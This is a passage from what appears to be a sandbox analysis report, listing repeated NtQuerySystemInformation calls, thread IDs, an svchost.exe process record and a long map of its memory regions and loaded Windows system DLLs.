SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16d88) returned 0x0 [0298.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16dc8) returned 0x0 [0300.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x17080) returned 0x0 [0302.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x17438) returned 0x0 [0304.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x174b8) returned 0x0 [0306.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x17240) returned 0x0 [0308.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x17080) returned 0x0 [0311.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x170c0) returned 0x0 [0313.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16930) returned 0x0 [0315.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16838) returned 0x0 [0318.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16838) returned 0x0 [0320.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16838) returned 0x0 [0323.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x167f8) returned 0x0 [0325.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x164b8) returned 0x0 [0327.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0xa72f540 | out: SystemInformation=0x3e960e0, ResultLength=0xa72f540*=0x16128) returned 0x0 Thread: id = 200 os_tid = 0xd1c Thread: id = 201 os_tid = 0xcec Thread: id = 202 os_tid = 0x740 Thread: id = 203 os_tid = 0xcc8 Thread: id = 214 os_tid = 0x420 [0327.762] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0327.763] RoInitialize () returned 0x1 [0327.763] RoUninitialize () returned 0x0 [0327.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e960e0, Length=0x20000, ResultLength=0x689f360 | out: SystemInformation=0x3e960e0, ResultLength=0x689f360*=0x15ff0) returned 0x0 Thread: id = 215 os_tid = 0xa50 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x740e5000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x210" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c778" [0xc000000f], "LOCAL" [0x7] Region: id = 2107 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2108 start_va = 0x1eedd70000 end_va = 0x1eeddeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eedd70000" filename = "" Region: id = 2109 start_va = 0x1eede00000 end_va = 0x1eedffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eede00000" filename = "" Region: id = 2110 start_va = 0x1eee380000 end_va = 0x1eee47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee380000" filename = "" Region: id = 2111 start_va = 0x1eee580000 end_va = 0x1eee5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee580000" filename = "" Region: id = 2112 start_va = 0x1eee600000 end_va = 0x1eee67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee600000" filename = "" Region: id = 2113 start_va = 0x1eee680000 end_va = 0x1eee6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee680000" filename = "" Region: id = 2114 start_va = 0x1eee800000 end_va = 0x1eee87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee800000" filename = "" Region: id = 2115 start_va = 0x1eee980000 end_va = 0x1eeea7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eee980000" filename = "" Region: id = 2116 start_va = 0x1eeea80000 end_va = 0x1eeeafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eeea80000" filename = "" Region: id = 2117 start_va = 0x1eeec00000 end_va = 0x1eeecfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eeec00000" filename = "" Region: id = 2118 start_va = 0x1eeed00000 end_va = 0x1eeedfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eeed00000" filename = "" Region: id = 2119 start_va = 0x1eeee00000 end_va = 0x1eeeefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eeee00000" filename = "" Region: id = 2120 start_va = 0x1eeef00000 end_va = 0x1eeeffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eeef00000" filename = "" Region: id = 2121 start_va = 0x1eef700000 end_va = 0x1eef77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eef700000" filename = "" Region: id = 2122 start_va = 0x1eef780000 end_va = 0x1eef7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eef780000" filename = "" Region: id = 2123 start_va = 0x1eef800000 end_va = 0x1eef87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eef800000" filename = "" Region: id = 2124 start_va = 0x1eefc80000 end_va = 0x1eefcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001eefc80000" filename = "" Region: id = 2125 start_va = 0x1ef0100000 end_va = 0x1ef01fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0100000" filename = "" Region: id = 2126 start_va = 0x1ef0200000 end_va = 0x1ef02fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0200000" filename = "" Region: id = 2127 start_va = 0x1ef0980000 end_va = 0x1ef0a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0980000" filename = "" Region: id = 2128 start_va = 0x1ef0a80000 end_va = 0x1ef0b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0a80000" filename = "" Region: id = 2129 start_va = 0x1ef0b80000 end_va = 0x1ef0c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0b80000" filename = "" Region: id = 2130 start_va = 0x1ef0c80000 end_va = 0x1ef0d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0c80000" filename = "" Region: id = 2131 start_va = 0x1ef0d80000 end_va = 0x1ef0e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0d80000" filename = "" Region: id = 2132 start_va = 0x1ef0e80000 end_va = 0x1ef0f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0e80000" filename = "" Region: id = 2133 start_va = 0x17efb4b0000 end_va = 0x17efb4bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb4b0000" filename = "" Region: id = 2134 start_va = 0x17efb4c0000 end_va = 0x17efb4c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2135 start_va = 0x17efb4d0000 end_va = 0x17efb4e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb4d0000" filename = "" Region: id = 2136 start_va = 0x17efb4f0000 end_va = 0x17efb4f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb4f0000" filename = "" Region: id = 2137 start_va = 0x17efb500000 end_va = 0x17efb500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb500000" filename = "" Region: id = 2138 start_va = 0x17efb510000 end_va = 0x17efb511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb510000" filename = "" Region: id = 2139 start_va = 0x17efb520000 end_va = 0x17efb5ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2140 start_va = 0x17efb5e0000 end_va = 0x17efb5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb5e0000" filename = "" Region: id = 2141 start_va = 0x17efb5f0000 end_va = 0x17efb5f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb5f0000" filename = "" Region: id = 2142 start_va = 0x17efb600000 end_va = 0x17efb6bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb600000" filename = "" Region: id = 2143 start_va = 0x17efb6c0000 end_va = 0x17efb6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb6c0000" filename = "" Region: id = 2144 start_va = 0x17efb6d0000 end_va = 0x17efb6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb6d0000" filename = "" Region: id = 2145 start_va = 0x17efb6e0000 end_va = 0x17efb6e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb6e0000" filename = "" Region: id = 2146 start_va = 0x17efb6f0000 end_va = 0x17efb6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb6f0000" filename = "" Region: id = 2147 start_va = 0x17efb700000 end_va = 0x17efb7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb700000" filename = "" Region: id = 2148 start_va = 0x17efb800000 end_va = 0x17efb8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efb800000" filename = "" Region: id = 2149 start_va = 0x17efb900000 end_va = 0x17efba87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efb900000" filename = "" Region: id = 2150 start_va = 0x17efba90000 end_va = 0x17efbc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efba90000" filename = "" Region: id = 2151 start_va = 0x17efbc20000 end_va = 0x17efbc83fff monitored = 0 entry_point = 0x17efbc35ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2152 start_va = 0x17efbc90000 end_va = 0x17efbcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbc90000" filename = "" Region: id = 2153 start_va = 0x17efbcb0000 end_va = 0x17efbccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbcb0000" filename = "" Region: id = 2154 start_va = 0x17efbcd0000 end_va = 0x17efbceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbcd0000" filename = "" Region: id = 2155 start_va = 0x17efbcf0000 end_va = 0x17efbcf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000017efbcf0000" filename = "" Region: id = 2156 start_va = 0x17efbd00000 end_va = 0x17efbd00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbd00000" filename = "" Region: id = 2157 start_va = 0x17efbd10000 end_va = 0x17efbd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbd10000" filename = "" Region: id = 2158 start_va = 0x17efbd20000 end_va = 0x17efbd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbd20000" filename = "" Region: id = 2159 start_va = 0x17efbd60000 end_va = 0x17efbd66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbd60000" filename = "" Region: id = 2160 start_va = 0x17efbdb0000 end_va = 0x17efbdb6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbdb0000" filename = "" Region: id = 2161 start_va = 0x17efbe00000 end_va = 0x17efbefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbe00000" filename = "" Region: id = 2162 start_va = 0x17efbf00000 end_va = 0x17efbffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efbf00000" filename = "" Region: id = 2163 start_va = 0x17efc000000 end_va = 0x17efc0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efc000000" filename = "" Region: id = 2164 start_va = 0x17efc100000 end_va = 0x17efc1dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2165 start_va = 0x17efc260000 end_va = 0x17efc35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efc260000" filename = "" Region: id = 2166 start_va = 0x17efc400000 end_va = 0x17efc4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efc400000" filename = "" Region: id = 2167 start_va = 0x17efc500000 end_va = 0x17efc5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efc500000" filename = "" Region: id = 2168 start_va = 0x17efc600000 end_va = 0x17efc936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2169 start_va = 0x17efca00000 end_va = 0x17efcafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efca00000" filename = "" Region: id = 2170 start_va = 0x17efcb00000 end_va = 0x17efcbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efcb00000" filename = "" Region: id = 2171 start_va = 0x17efcc00000 end_va = 0x17efccfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efcc00000" filename = "" Region: id = 2172 start_va = 0x17efcd00000 end_va = 0x17efcdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efcd00000" filename = "" Region: id = 2173 start_va = 0x17efce00000 end_va = 0x17efcefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efce00000" filename = "" Region: id = 2174 start_va = 0x17efcf00000 end_va = 0x17efcffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efcf00000" filename = "" Region: id = 2175 start_va = 0x17efd000000 end_va = 0x17efd0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efd000000" filename = "" Region: id = 2176 start_va = 0x17efd100000 end_va = 0x17efd1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efd100000" filename = "" Region: id = 2177 start_va = 0x17efd200000 end_va = 0x17efd2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000017efd200000" filename = "" Region: id = 2178 start_va = 0x7df5ff590000 end_va = 0x7ff5ff58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff590000" filename = "" Region: id = 2179 start_va = 0x7ff700b20000 end_va = 0x7ff700c1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff700b20000" filename = "" Region: id = 2180 start_va = 0x7ff700c20000 end_va = 0x7ff700c42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff700c20000" filename = "" Region: id = 2181 start_va = 0x7ff7019e0000 end_va = 0x7ff7019ecfff monitored = 0 entry_point = 0x7ff7019e3980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2182 start_va = 0x7ffb3b030000 end_va = 0x7ffb3b062fff monitored = 0 entry_point = 0x7ffb3b03ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2183 start_va = 0x7ffb488c0000 end_va = 0x7ffb489b5fff monitored = 0 entry_point = 0x7ffb488f9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2184 start_va = 0x7ffb48ed0000 end_va = 0x7ffb48ee0fff monitored = 0 entry_point = 0x7ffb48ed2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2185 start_va = 0x7ffb49070000 end_va = 0x7ffb49083fff monitored = 0 entry_point = 0x7ffb49071800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2186 start_va = 0x7ffb4a2b0000 end_va = 0x7ffb4a32efff monitored = 0 entry_point = 0x7ffb4a2c7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2187 start_va = 0x7ffb4c020000 end_va = 0x7ffb4c02afff monitored = 0 entry_point = 0x7ffb4c021d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2188 start_va = 0x7ffb4c040000 end_va = 0x7ffb4c087fff monitored = 0 entry_point = 0x7ffb4c04a1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2189 start_va = 0x7ffb4ccc0000 end_va = 0x7ffb4cd1cfff monitored = 0 entry_point = 0x7ffb4ccd2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2190 start_va = 0x7ffb4cf40000 end_va = 0x7ffb4cf4dfff monitored = 0 entry_point = 0x7ffb4cf42e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2191 start_va = 0x7ffb4cf50000 end_va = 0x7ffb4cf69fff monitored = 0 entry_point = 0x7ffb4cf52430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2192 start_va = 0x7ffb4cf70000 end_va = 0x7ffb4cf85fff monitored = 0 entry_point = 0x7ffb4cf719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2193 start_va = 0x7ffb4cf90000 end_va = 0x7ffb4cfc7fff monitored = 0 entry_point = 0x7ffb4cf968f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2194 start_va = 0x7ffb4cfd0000 end_va = 0x7ffb4d007fff monitored = 0 entry_point = 0x7ffb4cfe8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2195 start_va = 0x7ffb4d010000 end_va = 0x7ffb4d0a8fff monitored = 0 entry_point = 0x7ffb4d02a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2196 start_va = 0x7ffb4ed00000 end_va = 0x7ffb4ed10fff monitored = 0 entry_point = 0x7ffb4ed03320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2197 start_va = 0x7ffb4ee70000 end_va = 0x7ffb4ef7afff monitored = 0 entry_point = 0x7ffb4eeb2610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2198 start_va = 0x7ffb4f040000 end_va = 0x7ffb4f107fff monitored = 0 entry_point = 0x7ffb4f0813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2199 start_va = 0x7ffb4f5b0000 end_va = 0x7ffb4f61ffff monitored = 0 entry_point = 0x7ffb4f5d2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2200 start_va = 0x7ffb4fa90000 end_va = 0x7ffb4faa7fff monitored = 0 entry_point = 0x7ffb4fa95910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2201 start_va = 0x7ffb4fcb0000 end_va = 0x7ffb4fe60fff monitored = 0 entry_point = 0x7ffb4fd03690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2202 start_va = 0x7ffb50760000 end_va = 0x7ffb50768fff monitored = 0 entry_point = 0x7ffb507619a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2203 start_va = 0x7ffb50770000 end_va = 0x7ffb5077afff monitored = 0 entry_point = 0x7ffb50771cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2204 start_va = 0x7ffb519f0000 end_va = 0x7ffb51b75fff monitored = 0 entry_point = 0x7ffb51a3d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2205 start_va = 0x7ffb51be0000 end_va = 0x7ffb51bf2fff monitored = 0 entry_point = 0x7ffb51be2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2206 start_va = 0x7ffb51e90000 end_va = 0x7ffb51eb6fff monitored = 0 entry_point = 0x7ffb51e97940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2207 start_va = 0x7ffb51ee0000 end_va = 0x7ffb51f89fff monitored = 0 entry_point = 0x7ffb51f07910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2208 start_va = 0x7ffb522f0000 end_va = 0x7ffb52321fff monitored = 0 entry_point = 0x7ffb52302340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2209 start_va = 0x7ffb52470000 end_va = 0x7ffb52493fff monitored = 0 entry_point = 0x7ffb52473260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2210 start_va = 0x7ffb52610000 end_va = 0x7ffb52703fff monitored = 0 entry_point = 0x7ffb5261a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2211 start_va = 0x7ffb52880000 end_va = 0x7ffb5288bfff monitored = 0 entry_point = 0x7ffb528827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2212 start_va = 0x7ffb52960000 end_va = 0x7ffb52990fff monitored = 0 entry_point = 0x7ffb52967d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2213 start_va = 0x7ffb52bd0000 end_va = 0x7ffb52beefff monitored = 0 entry_point = 0x7ffb52bd5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2214 start_va = 0x7ffb52d40000 end_va = 0x7ffb52d9bfff monitored = 0 entry_point = 0x7ffb52d56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2215 start_va = 0x7ffb52f10000 end_va = 0x7ffb52f1afff monitored = 0 entry_point = 0x7ffb52f119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2216 start_va = 0x7ffb530f0000 end_va = 0x7ffb5311cfff monitored = 0 entry_point = 0x7ffb53109d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2217 start_va = 0x7ffb53280000 end_va = 0x7ffb532d5fff monitored = 0 entry_point = 0x7ffb53290bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2218 start_va = 0x7ffb53300000 end_va = 0x7ffb53328fff monitored = 0 entry_point = 0x7ffb53314530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2219 start_va = 0x7ffb53470000 end_va = 0x7ffb5347efff monitored = 0 entry_point = 0x7ffb53473210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2220 start_va = 0x7ffb53480000 end_va = 0x7ffb534cafff monitored = 0 entry_point = 0x7ffb534835f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2221 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2222 start_va = 0x7ffb534f0000 end_va = 0x7ffb534fffff monitored = 0 entry_point = 0x7ffb534f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2223 start_va = 0x7ffb53b70000 end_va = 0x7ffb53d57fff monitored = 0 entry_point = 0x7ffb53b9ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2224 start_va = 0x7ffb53d60000 end_va = 0x7ffb53f26fff monitored = 0 entry_point = 0x7ffb53dbdb80 region_type = mapped_file name = 